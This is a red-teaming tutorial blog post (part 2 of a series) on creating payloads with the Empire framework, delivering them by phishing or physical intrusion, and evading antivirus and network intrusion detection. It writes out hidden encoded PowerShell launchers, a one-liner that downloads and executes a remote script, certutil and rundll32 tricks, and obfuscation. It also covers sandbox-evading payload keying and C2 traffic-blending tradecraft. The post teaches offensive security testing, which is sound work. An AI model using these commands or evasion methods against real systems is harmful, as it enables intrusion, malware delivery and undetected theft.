RedTeaming from Zero to One – Part 2

This is a continuation to the last blog in the series – RedTeaming from Zero to One – Part 1. I strongly recommend everyone who is reading this to first go through the first part and then come here. In the last blog, we have already covered – What is RedTeaming? Pentesting vs RedTeaming, Our Objective, C2/Post-Exploitation Framework selection and C2 infra setup.

In this part, we will cover Payload Creation, Payload delivery and AV/NIDS Evasion.

3. Payload Creation

Empire gives us a variety of options to generate your Powershell agent which includes – exe, dll, Macro, HTA, bat, lnk, SCT, shellcode, bunny, ducky, etc

Empire windows payload options

Some payload creation Techniques:

3.1 One liner Powershell payload

Here the whole 1st stage of the payload is base64 encoded and is executed using Powershell iex(Invoke Expression). It will further download the full Powershell agent from C2 server once executed. This one liner Powershell payload can be embedded inside a macro, HTA file or it can be embedded as an OLE object. It has high chances of getting detected and flagged by AV at this stage.

> Powershell -W Hidden -nop -noni -enc <base64 payload>  -> Would decode and execute the base64 Powershell payload

One liner base64 encoded empire payload

3.2 Windows One liner to download and execute arbitrary code.

There are multiple ways to download and execute a file from a remote server. We can achieve the same using Powershell, Wscript, mshta, rundll32, Wmic, regsvr32, MSBuild, etc.

Instead of passing base64 payload directly as a command line parameter, we can tell Powershell to download the ps1 file from C2 server and execute it. It has also very high chances of getting flagged by AV but there are ways you can try to evade AV’s which we will discuss in AV evasion part.

Powershell -exec bypass -c “(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(‘http://webserver/payload.ps1’)|iex”  -> Would use the system proxy, download and execute a ps1 file

Powershell one liner to download & execute payload using system proxy

Here is an excellent resource written by @arno0x0x on windows one liners to download & execute arbitrary code.

3.3 HID Payloads

During the engagement, if our payload delivery via email fails or it gets detected then we can try to execute it after a successful physical intrusion using a HID device such as bash bunny or rubber ducky. USB’s are blocked in almost all the major organizations who are serious about security, so forget about inserting a flash drive into any of the system. In my experience, I have seen HID attacks to be pretty successful during real engagements.

You can execute your Powershell payload using different file extensions like bat, SCT, lnk, etc or you can just write the whole empire Powershell script using rubber ducky and execute it. It has less chances of detection, but the file touches the disk and may leave some more forensic evidence.

Vbs script generated by empire

 

3.4 Running Powershell payload without using Powershell.exe

Since, Powershell is being heavily abused by malware authors, a lot of organizations either completely block Powershell.exe execution or enable all the Powershell logging modules which is then passed to a central log analysis tool which might trigger an alarm if it sees any suspicions activity. If Powershell execution is blocked, we can launch Powershell without running Powershell.exe. It can be achieved using multiple ways.

3.4.1 Using Powershdll

We can run Powershell scripts using a dll file only. it does not require access to Powershell.exe as it uses Powershell automation dlls. If we can’t directly transfer the dll file to a remote machine, We can build the dll file using certutil command with a HID device and then use that dll file to execute any Powershell one liner code or script.

> base64 Powershdll.dll > Powershdll_b64.txt (converts the dll file into base64 and use a HID device to transfer this base64 data onto the victim’s machine)
> certutil -decode Powershdll_b64.txt output.dll (again convert the base64 chunck of data into a dll file)
> rundll32 output,main “Powershell script”

Run base64 encoded script using Powershdll

> rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex

There are multiple other techniques to execute Powershell code when Powershell.exe is blocked. You can use MSBuild utility to build your own exe file or you can build a SCT file which doesn’t call Powershell.exe

 

4. Payload Delivery

There are only two major payload delivery options when it comes to delivering payload inside the internal network of an organization:

4.1. Via Email

A well crafted spear phishing email is enough to bring down an organization to it’s knees but It’s getting more and more difficult to deliver the payload via email since every organization focuses heavily on email security. Your attachment or download link would be inspected by a series of different security appliances and it has to bypass all of them before getting executed on the machine.

It would have to bypass atleast the recipient’s email security gateway, web filter and the endpoint protection. It also depends a lot on how you have embedded your payload and what security appliances are in place.

At the time of writing, There are three ways I can think of delivering your payload via email attachment/embedded download link.

  • Office macros (Still the best way as macros are enabled by default in a lot of organizations for legit work)
  • HTA file (Considerable, executed by Microsoft HTML Application Host – mshta.exe)
  • Office DDE exploit (Patched now. Useless if client has latest version of Office)

Other ways to deliver malware via email which you can’t expect to work in the current scenario but you may give it a try depending on the strength of the defensive appliances used within an organization.

  • Browser exploits – Useless, until you have a zero day for the latest browser (IE mostly).
  • Delivering EXE’s – Delivering a malware embedded into an exe file should be the last thing you should think of as a red teamer. Any exe downloaded from the internet would have to go through heavy inspection and continuous behaviour monitoring. In restricted environments, the digital signature of an executable is checked before it gets executed. If it isn’t signed by a popular entity, the endpoint protection would block the execution of that exe file.
  • Microsoft office OLE exploits – You can give it a try but all the endpoint protection softwares actually look for any OLE embedded object inside any office file. It would get flagged 9/10 times.
  • Java drive-by download/flash exploits – Would get flagged immediately by the endpoint protection most of the times.

The risky part of delivering malware through email is that, if your payload gets flagged by the endpoint protection, blue teams might start investigating it and they might block your phishing domain from inside of their organization, thus ending your hopes of delivering any phishing email later through that email server.

Another way is to make the malware payload check for a specific windows domain, before decrypting the actual payload. If the blue team tries to analyse your malware in a sandbox or a virtualized environment, they would be unsuccessful in finding out your C2 domain as it would stay encrypted till it finds the correct windows domain that it is looking for. This will make sure that the payload is decrypted and executed only in an active directory environment with the correct windows domain that we have set. For others, it would be just an encrypted blob. Similarly, you can also make your payload check a predefined public ip address instead of the windows domain name which will make sure that it gets executed in the same organization that you intended to.

4.2. After a successful physical intrusion/Social engineering

In almost, all of the big organizations, any kind of mass storage device over USB is always blocked by a policy enforced either via Active directory or by the DLP (Data loss prevention) endpoint software. So, putting in flash drive in any system is out of question here. We have to find any unattended/locked system which we can use it for our purpose. If we get few seconds in front of an unlocked system, it would be much easier or if we can social engineer some employee to give us access to his/her unlocked system for few minutes disguising ourselves as an IT guy. If the system is locked, we can use konboot utility to bypass the password if we have enough time.

4.2.1. konboot (Password bypass tool – works like a charm)

It’s a utility loaded in a USB drive which has a small version of portable linux system running on it. You need to plug it in and reboot the system. It does some changes in the runtime and you don’t need to enter any password to log into a windows system. The advantage of using this over any other password cracking utilities is that it just removes the password for once and from the next boot the system will work as it was set before. It neither removes the password from the SAM nor changes it, making it stealthy and it goes un-noticed as when the next time an employee logs in, he won’t find anything suspicious.

For systems, which are connected to a domain, here is a handy trick for this to work since the authentication happens with the Domain controller and not locally. Plug out the LAN cable, plug the konboot usb in and then reboot the system. I am not exactly sure how this works but it somehow does the authentication locally from cache and does not attempt to connect to AD. Once you have bypassed the password, you can plug in the LAN cable again and become a domain user.

Note down the network details from there (IP address, gateway, subnet mask, MAC address) as it would come handy later with network implants or if you want to connect your kali machine to the local network considering the fact that the IP allocation is static and there is a NAC (network access control) in place which checks for valid devices connected to the network.

A commercial licence of konboot for windows costs around 75$. It would not work if the drive is encrypted since the OS needs the password for decryption.

4.2.2. HID devices (Emulates as a legit keyboard)

When we have an unlocked system in front of us for few seconds, we can use USB HID devices which can emulate as a keyboard and can type full length payloads automatically. The system will detect it as a keyboard and thus allow it to run. There are different HID devices available, You can also make one of your own using Adruino pro micro if you want it cheap but I prefer Rubber ducky and Bash bunny from Hak5. It is well packaged, stealthy, very easy to setup and bash bunny has got a lot of options. You can also emulate your android phone as a HID device using kali Nethunter.

You can put your payload inside rubber ducky/bash bunny, once plugged in, it will automatically open cmd, Powershell or notepad and type your payload within few seconds or you can use it to create .bat or .vbsript file or .HTA file and execute it. It’s always better to use a payload which does not touches the disk and runs in the memory. An excellent example of this is Powershell Invoke-Expression. It lets you run any Powershell script in memory without touching the disk thus minimizing the risk of detection.

You can also drop few rubber duckies around the building if you can afford loosing them, hoping that someone would plug it in in their system. The risk involved here is that will see something happening on the screen and it might arise suspicion.

4.2.3. Network implants (Hidden remote backdoor)

Hak5 has developed some excellent hardware devices which can work as a remote backdoor during a red team assessment. One of my favorite device is LAN Turtle. You can either plug it in the CPU along with the LAN wire or just plug any free LAN wire into it and power it up with a USB charger, Because of it’s small size and design, It can go unnoticed for weeks/months if placed properly.

It has a lot of amazing functionalities like AutoSSH/OpenVPN client. I personally suggest to use OpenVPN client module which will bridge you to the organization’s network through which you can perform further exploitation. You can also use the responder module in LAN Turtle to capture NTLM hashes and access other machines using the hash. It just puts you in the organization’s network while you are sitting at your couch watching netflix!

 

5. AV/Endpoint protection/NIDS Evasion

I am not an expert in AV/NIDS Evasion but after a lot of reading and experimenting with different AV’s, I got few basic techniques which works for me. At the time of writing, I could bypass some most commonly used Entrprise Endpoint Protection softwares working along with a commercial NIDS on fully patched & updated Win7. What I have learnt from my experience is, In order to evade AV’s and IDS, you first need to understand how they actually work. The greater understanding you have as how they flag certain program as malicious, the better you would be at evasion.

5.1 Antivirus/Endpoint Evasion

I don’t want to reveal the exact technique which worked for me as it might not work for you. What worked for me at the time of writing, might not work for you as AV vendors might update their detection techniques or signatures but I will state few important points regarding AV evasion:

5.1.1. Avoid dropping an executable for payload delivery

Any executable downloaded from the internet would be heavily inspected through a series of security products. Using Heuristics, AV’s would try to execute it in a sandbox and check for possible signatures of any known malware by reverse engineering it. Further, if it’s an un-signed binary it might not get executed due to the policies enforced on the system.

5.1.2. Use preloaded Microsoft tools

Windows systems comes with loads of pre-loaded tools like Powershell, WMI, mshta, Wscript, regsvr32, etc which can be used to download/execute your malware payload. The advantage of using pre-loaded binaries is that we can easily bypass the app restrictions and since these are legitimate signed Windows binaries, It would make the attack look less suspicous.

5.1.3. Powershell attacks still work

In recent times, Powershell has been heavily abused by malware authors and AV vendors have also updated their signatures accordingly detecting almost all of the default payloads generated by any framework which is on the internet. Still, it’s not very difficult to bypass most AV’s signature based detection.

Win 10 comes preloaded with AMSI(Antimalware Scan Interface) which has made evasion harder but still the majority of any big organization’s infrastructure is on Win 7. I will update this blog after I have worked more on AMSI.

5.1.4. Obfuscation, Obfuscation and more Obfuscation always works

Using Obfuscation, I was successful at bypassing most of the Endpoint protection softwares. Thanks a ton to @danielhbohannon for creating few awesome Obfuscation projects. He has created 4 great projects on Obfuscation which is helpful for redteams as well as blue teams:

Invoke-Obfuscation
Revoke-Obfuscation
Invoke-CradleCrafter
Invoke-DOSfuscation

I recommend anyone who is reading this blog to play with these frameworks and learn how you can customize more of it’s default outputs.

Sample Powershell command without Obfuscation:

Write-Host ‘Test Obfuscation’ -Import test

Same command with Obfuscation

.(“{2}{1}{0}”-f ‘t’,’s’,’Write-Ho’) (“{2}{5}{1}{3}{0}{4}”-f’scatio’,’st ‘,’T’,’Obfu’,’n’,’e’) -Import (“{1}{0}”-f ‘est’,’t’)

Invoke-Obfuscation

The other two great projects are Veil and Shellter. Though, I have never used them in any real engagement as they deal with executables mostly.

Modern Endpoint Protection have also some Host based IDS features built-in like checking for malicious host traffic, web reputation, etc which we will discuss in NIDS evasion.

5.2 NIDS Evasion

After we have successfully bypassed Endpoint Protection, we also need to bypass Enterprise grade NIDS systems. Broadly, NIDS can be divide into two different categories:

5.2.1. Signature based NIDS

Signature based NIDS works by matching the network traffic with any known malware traffic pattern. It can include the C2 server domain, Protocol used, Url used, User Agent, Server Version, Default page, etc.

In Empire, these C2 indicators can easily be changed. NIDS database has the network traffic pattern of default traffic of Empire or any known major exploitation framework. If we make our network pattern unique, we can easily bypass the signature based NIDS. The screenshot below is of empire agent’s HTTP traffic. It looks similar to normal web traffic. We have changed the default C2 indicators like C2 URL, User Agent, Server Header, response HTML Body, etc.

Custom Empire agent C2 communication HTTP traffic

5.2.2 Traffic Anomaly based NIDS

Anamoly based NIDS works in a different way than Signature based IDS. anamoly based IDS builds a pattern of normal flow of traffic inside the organization. They feed this data into their machine learning algorithm. If the IDS finds any traffic which does not matches the normal traffic pattern, It will flag it as malicious. If we can blend our C2 traffic as the normal traffic pattern, we can evade anamoly based IDS.

I would state few points for NIDS evasion which I have learnt along my journey.

5.2.2.1. Selection of the right C2 communication protocol

You have a variety of options when it comes to selecting C2 protocol. You payload could communicate to the C2 using TCP, HTTP(s), DNS, ICMP or a custom protocol. The best way to evade detection is to blend in. For example, Meterpreter maintains a constant TCP connection with the C2 server as we can see in the screenshot below. The traffic pattern is very predictable, thus it can be detected easily.

Constant Meterpreter Traffic over TCP

If we choose any custom C2 protocol, it might also arise suspicion as that custom protocol is not in the normal traffic dataset. One of the best ways to blend in is to use commonly used protocols like HTTP or DNS. When using HTTP, we can easily blend in normal web traffic. Here, we have setup our Empire C2 server emulating as Microsoft’s Live email server. We can also use DNS for the C2 communication but it has it’s own limitations. When using DNS as C2 protocol, the data transfer speed would be really slow and the network would make thousand’s of encrypted DNS requests which might arise suspicion. The C2 protocol selection entirely depends on the organization you are targeting.

Empire traffic in HTTP with a custom delay and jitter

5.2.2.2. Selection of the right C2 domain

Never use just an IP address for C2 server communication. Any good NIDS would block repeated connection to just an IP address and your C2 traffic would stand out from the rest, as normally, web communication happens only with a domain name. The domain you are using for your C2 server also matters when it comes to NIDS evasion. If your C2 domain has a bad reputation, then the NIDS might entirely block your domain from communicating to any of the systems. Always check your domain’s reputation if you are buying a pre-owned domains.

Buy domains from specific categories like healthcare or finance, since there are less chances that the IDS would inspect or break the SSL connection for that category of domains because of compliance issues.

You should also consider aging your domains. Newly bought domains might arise suspicion.

5.2.2.3. Blending your C2 traffic in the normal traffic

If you are using commonly used protocols like HTTP/DNS, you have already blended yourself in the normal traffic pattern but still, anamoly based NIDS can detect you easily if you communicate with your C2 with the default time interval.

You should increase your agent’s callback time from the default value(5s) to a greater value. Using jitter along with a longer delay time will truly blend you in. Increasing your callback time too much would be frustrating, as to execute one command you would have to wait for your callback time interval to finish. You have to find a balance between the two which works best for you.

5.2.2.4. C2 traffic over SSL with a valid certificate

Even though, empire sends the C2 traffic in the body of HTTP using POST method which is always encrypted, It is not enough to bypass NIDS. Generally, Normal web traffic doesn’t encrypts the entire http POST body which can arise suspicion. Below is the screenshot of normal Empire communication.

Encrypted message body during empire C2 communication

IDS can clearly see your entire web traffic, dissect and analyze it. It would be more suspicious if the traffic is in HTTP. A lot of NIDS just let the SSL traffic go without inspecting them. It also depends a lot on how the organization has implemented their IDS and whether they are breaking the SSL connection for packet inspection or not.

It’s always better to use SSL for your C2 traffic and always use a valid and signed certificate from any known CA Authority. We have already discussed as how to setup C2 infra with SSL in the C2 Infra part.

Encrypted Empire C2 data over SSL

Conclusion

AV/NIDS evasion would always be a cat and mouse game. The techniques I have discussed above worked at the time of writing. It might not work when your try it on your system. The agenda of the blog was to teach beginners as what all things we have to consider when we work as a part of the RedTeam and our objective is to gain an initial foothold in the network. Whatever we have discussed in this blog is not absolute. You might have to change the C2 framework, Protocol in use, AV Evasion techniques, C2 profile, C2 infra, etc. depending on the situations and organization’s security policies.

For example, if you have ever worked with the banking sector, you would have known that a lot of banks’ infra have implemented IP whitelisting. Their internal systems would connect to only selected IP addresses which are predefined in the IDS ruleset. In such situation, you can use DNS for your C2 communication which will help you to bypass IP whitelisting as we are not connecting to any IP address for C2 communication. Cobalt Strike has excellent options for DNS beacons.

The crux of the whole post is, Red Teams will always find a way to bypass the latest defensive techniques/softwares while Blue Teams will always have to keep implementing new techniques to defend their organization. It’s a constant tug of war game and the one with the better level of preparedness would win!

We will post more blogs in this Red Team Series. Reviews, comments and critics are welcome. Thanks for reading.

Leave a Reply

Your email address will not be published. Required fields are marked *

20 + eleven =